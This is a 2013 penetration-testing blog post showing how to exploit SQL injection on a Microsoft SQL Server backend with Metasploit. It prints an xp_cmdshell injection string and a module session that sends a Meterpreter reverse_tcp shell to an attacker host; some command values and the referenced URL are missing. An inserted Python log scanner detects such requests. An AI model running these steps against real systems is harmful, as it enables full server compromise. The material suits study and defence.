Tuesday, 29 January 2013

Exploiting SQL injection vulnerabilities with Metasploit (Part-1)

In this post we show how to exploit a SQL injection vulnerability in a web application that uses a Microsoft SQL Server backend where xp_cmdshell is available to the attacker. During a penetration test, the web application is found to be vulnerable to SQL injection, and the penetration tester can execute administrative stored procedures:

;exec master..xp_cmdshell 'ping';--

If the request shown above is successful, arbitrary commands can be executed on the host. At this point there are a number of options that would allow the tester to fully compromise the server. Public tools exist that help automate the takeover process. This post covers the use of a Metasploit module.
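From the defending side, a request like the one described above leaves a recognisable trace in web server access logs. The following is an added example (not part of the original post or of the Metasploit module) that scans access-log lines for stacked statements calling xp_cmdshell; the log lines, paths, addresses and rule names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Common Log Format; hosts, paths and parameters are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Jan/2013:10:01:02 +0000] "GET /item.asp?id=12 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [29/Jan/2013:10:01:09 +0000] "GET /item.asp?id=12;exec%20master..xp_cmdshell%20%27ping%20192.0.2.10%27;-- HTTP/1.1" 200 312',
    '198.51.100.4 - - [29/Jan/2013:10:02:30 +0000] "GET /item.asp?id=1%253BEXEC/**/master.dbo.XP_CMDSHELL%2527ping%2527 HTTP/1.1" 500 88',
    '198.51.100.4 - - [29/Jan/2013:10:03:11 +0000] "GET /search.asp?q=executive+summary HTTP/1.1" 200 2048',
]

# Client address and request target from one log line.
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Hypothetical rule names; patterns run against the normalized query string.
RULES = {
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b"),
    "stacked_exec": re.compile(r";\s*exec(?:ute)?\b"),
    "sp_configure": re.compile(r"\bsp_configure\b"),
}

def normalize(query, max_rounds=3):
    """Decode repeatedly (covers double encoding), drop /* */ comments, fold whitespace and case."""
    for _ in range(max_rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    query = re.sub(r"/\*.*?\*/", " ", query, flags=re.S)
    return re.sub(r"\s+", " ", query).lower()

def scan_line(line):
    """Return (client, path, [rule names]) for a log line, or None if nothing matched."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    path, _, query = target.partition("?")
    text = normalize(query)
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    return (client, path, hits) if hits else None

def scan(lines):
    return [result for result in map(scan_line, lines) if result]

if __name__ == "__main__":
    for client, path, hits in scan(SAMPLE_LOG):
        print(f"{client} {path} -> {', '.join(hits)}")
```

This only sees GET query strings; injection delivered in POST bodies needs request-body logging or database-side auditing of xp_cmdshell use.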

The mssql_payload_sqli module will execute any Windows payload on the target host. In this example we will execute Meterpreter, which is one of the payloads that offer great flexibility to the penetration tester.

It is necessary to specify the exact point where the SQL injection vulnerability is. We do that by setting the GET_PATH variable with an [SQLi] token. The token marks the place where the payload will be executed. The rest of the exploitation process is the same as for any other vulnerability. This is the exploitation based on the URL shown above:

msf > use windows/mssql/mssql_payload_sqli

msf exploit(mssql_payload_sqli) > set GET_PATH
GET_PATH =>;[SQLi];--
msf exploit(mssql_payload_sqli) > set RHOST

msf exploit(mssql_payload_sqli) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp
PAYLOAD => windows/patchupmeterpreter/reverse_tcp

msf exploit(mssql_payload_sqli) > set LHOST

msf exploit(mssql_payload_sqli) > set LPORT 80
LPORT => 80

msf exploit(mssql_payload_sqli) > exploit

After exploitation, the attacker gets a Meterpreter shell.

[Image: SQL injection exploitation with Metasploit]

If you want to use this code, you can download it from the Secforce security tools repository.
